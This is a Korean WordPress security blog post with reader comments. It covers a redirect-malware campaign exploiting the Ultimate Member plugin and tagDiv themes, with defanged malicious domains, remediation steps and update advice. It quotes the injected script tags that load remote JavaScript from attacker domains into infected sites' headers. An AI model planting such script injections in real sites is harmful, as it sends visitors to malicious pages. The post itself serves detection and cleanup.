Ultimate Member 플러그인과 Newspaper 테마의 취약점을 악용한 리다이렉트 멀웨어

근래 들어 utroro[.]com으로 리디렉션되는 멀웨어에 감염된 워드프레스가 부쩍 늘어났습니다. 이 악성코드에 감염되면 사용자들은 다음과 같은 사이트로 리디렉션됩니다.

워드프레스 멀웨어

리디렉션되면 랜덤한 utroro[.]com 주소와 가짜 reCAPTCHA 이미지로 된 페이지가 표시됩니다.

utroro 주소 외에도 다음과 같은 주소로도 리다이렉트될 수 있습니다.

hxxp://murieh[.]space/?h=930130016_dc950a456f7_100&h_l=&h_5=sub_id_2&h_2=def_sub

hxxps://unverf[.]com/?h=930130016_dc950a456f7_100&h_l=&h_5=sub_id_2&h_2=def_sub

보안업체인 Sucuri 블로그 글에 의하면 이 멀웨어에 감염된 사이트에는 다음 두 사이트 중 하나로 된 스크립트 중 하나가 삽입됩니다.

  • cdn.eeduelements[.]com
  • cdn.allyouwant[.]online.

처음에는 위의 주소가 삽입되었다가, 약 1주일 후에 두 번째 주소가 출현했습니다. 하지만 해커가 귀차니즘 때문인지, 아니면 코딩 기술이 부족해서 그런지 몰라도 새로운 멀웨어 버전에 재감염되는 사이트에서는 먼저 주입된 코드가 제거되지 않아서 동일 사이트에 다음과 같은 두 스크립트가 모두 삽입될 수 있습니다.

...
<script type='text/javascript' src='hxxps://cdn.eeduelements[.]com/jquery.js?ver=1.0.8'></script><script type='text/javascript' src='hxxps://cdn.allyouwant[.]online/main.js?t=lp1'></script></head>
...

Sucuri 글이 작성될 당시(약 3일 전)에 cdn.eeduelements[.]com 스크립트가 포함된 사이트가 1700개 이상이고 cdn.allyouwant[.]online 스크립트가 포함된 사이트가 500개 이상이었습니다.

지금 체크해보니 각각 2300개 이상1700개 이상의 사이트에 이러한 스크립트가 포함되어 있네요. 감염된 사이트가 더 늘어났네요.

자세한 기술적인 내용은 Sucuri의 블로그 글에서 확인해볼 수 있습니다.

보호 조치

서너 가지의 감염 벡터(infection vector)와 여러 가지 악성 코드 변종을 통해 공격이 이루어지고 있습니다. 다음과 같은 조치를 취할 수 있습니다.

  • 모든 테마와 플러그인을 최신 버전으로 업데이트합니다. 특히 Ultimate Member(2.0.23 이전 버전) 플러그인이나 tagDiv의 테마(Newspaper, Newsmag 등)를 사용하는 경우에 반드시 최신 버전으로 업데이트하시기 바랍니다.
  • tagDiv 공격 벡터(해커가 컴퓨터나 네트워크에 접근하기 위해 사용하는 경로나 방법)의 경우 Theme panel > ADS > YOUR HEADER AD를 통한 테마의 관리자 인터페이스와 "사용자 정의 HTML" 위젯에서도 발견될 수 있습니다.
  • Ultimate Member를 통해 감염된 경우, wp-content/uploads/ultimatemember/temp/ 아래의 하위 디렉터리에 있는 모든 PHP 파일을 삭제하고 “header” 및 “jquery” 파일에서 위에 언급된 스크립트를 모두 제거합니다.
  • 동일 서버 계정을 공유하는 모든 사이트에서도 악성코드를 제거하고 보안 조치를 취해주어야 합니다. 그렇지 않으면 사이트가 곧바로 쉽게 다시 감염될 수 있습니다.

마치며

이번 대규모 감염은 제로 데이 공격(제로 데이 위협, Zero-Day Attack)이 어떻게 발생하고 보안취약점 위협기간(Vulnerability Window) 동안 어떻게 폭발적으로 증가하는지를 명확히 보여줍니다.

취약점이 공개되면 해당 기회를 틈탄 공격이 즉각적으로 증가하는 사례가 종종 있습니다. 해커는 인기 있는 테마와 플러그인의 변경을 면밀히 주시합니다. 보안 문제가 수정되는 것을 악의적인 해커가 알아차리게 되면 최신 버전으로 패치하지 않은 취약한 사이트를 대상으로 구버전의 취약점을 악용하려고 시도할 수 있습니다.

사이트의 모든 요소를 적시에 업데이트하여 감염 위험을 최소화하는 것이 매우 중요합니다. 테마나 CMS, 플러그인을 업데이트할 수 없는 경우 대부분의 신규 공격을 차단할 수 있는 웹사이트 방화벽을 이용하는 것을 고려해볼 수 있습니다.

워드프레스와 관련하여 어려움을 겪는 경우(사이트 접속 불능, 악성코드 감염  등) 여기에서 서비스(유료)를 의뢰하실 수 있습니다.


10개 댓글

  1. Ultimate Member 2.0 이상에서 header를 변경하더군요.
    위에서 제시한 사이트 뿐만 아니라 광범위한 주소로 리디렉션되고
    어느 순간 관리자까지 생성합니다. ~ .~

    두 달 전쯤 브라우저 캐시 때문에 한 1~2주간 멀웨어걸린지 모르고 있다가
    관리자 생성되는거 보고 이상하다 싶어 확인해보니
    새 시크릿 창에서 여러 주소로 리디렉션 시키더라구요.

    head 영역에서 스크립트 지우고 해결했습니다.

    Ultimate Member를 포함해서 보안에 취약한 몇몇 플러그인을 삭제했었는데
    이 포스트 읽어보니 결국 Ultimate Member 때문이었나보네요.
    쓰지도 않는데 괜히 켜둬서 ~. ~

    1. 안녕하세요?

      블로그를 방문해주셔서 감사합니다.

      멀웨어가 계속 변종을 일으켜서 unverf[.]com, tuniaf[.]com 등 다양한 사이트로 리디렉션될 수 있습니다.

      즐거운 추석 연휴 되시기 바랍니다 :)

  2. 어떤 사이트에 들어갔더니 주소창의 주소가 쉴 새 없이 바뀌며 어디론가 리디렉트 되는 것 같더군요. 놀래서 창을 닫아버렸어요. 그 사이트도 그럼 멀웨어에 감염되었던 건가봐요.

    1. 멀웨어에 감염된 사이트일 가능성이 높을 것 같습니다.

      예를 들어, 멀웨어에 감염되면 1.tuniaf[.]com, 2.tuniaf[.]com, 3.tuniaf[.]com....11.tuniaf[.]com 등과 같이 계속 주소가 바뀌면서 리디렉션될 수도 있습니다.

  3. 지난 23일 siteground의 제 웹사이트에 접속을 하니 처음에는 프로그인 업데이트가 안되더군요. 그러고나서 https://www.miningbarn.com 으로 리다이렉션이 되더군요. 그런데 공교롭게 이 문제가 siteground 의 SSL 업데이트 문제가 발견된 바로 다음에 일어나서 support에 문의하여 해결했습니다. 그런데 support 담당자가 사이트 스캔해봤는데 멀웨어 감염은 없었다고 하네요. 그렇다면 siteground에서 감염이 일어난 건지... 암튼 이제 별 경험을 다 합니다. 참고하세요~. ㅎㅎ

    문제의 사이트는 newspaper 테마(tagDiv)를 사용합니다.

    Thank you for your patience.

    I have turned your case to the attention of our system administrators and they have reapplied the SSL certificate for the domain.

    The application at https://mhjn.kr/ is working as intended.

    Please clear your browser's cache and verify on your end.

    We have also scanned your account for malicious files and no threats were found:

    Code:
    Scanning [/home/mhjn6068/public_html] ... Please wait...
    -----------------------------------------
    Scanned Files : 141918
    Scanner Hits : 0

    If you have further questions do not hesitate to contact us.

    1. 안녕하세요?

      멀웨어는 업데이트를 제대로 하지 않거나 약한 비밀번호, 잘못된 보안 관행으로 많이 발생합니다.

      특히 워드프레스, 테마, 플러그인을 최신 버전으로 유지하는 것이 중요합니다.

      SSL 보안 인증서 업데이트 문제 때문에 멀웨어가 발생하지는 않을 것 같습니다.

      mhjin[.]kr은 현재 공사 중 페이지가 표시되네요. 이런 경우에는 외부에서 사이트에 접근할 수 없으므로 멀웨어에 감염될 가능성은 매우 낮을 것입니다.

  4. 헉.. 제가 사용하는 테마에 리다이렉트 멀웨어..ㅜㅜ
    저는 테마는 업데이트가 되면 바로바로 하는 편인데 다시 확인을 해 봐야 되겠습니다..
    좋은 정보 감사합니다..!!

댓글 남기기

* 이메일 주소는 공개되지 않습니다.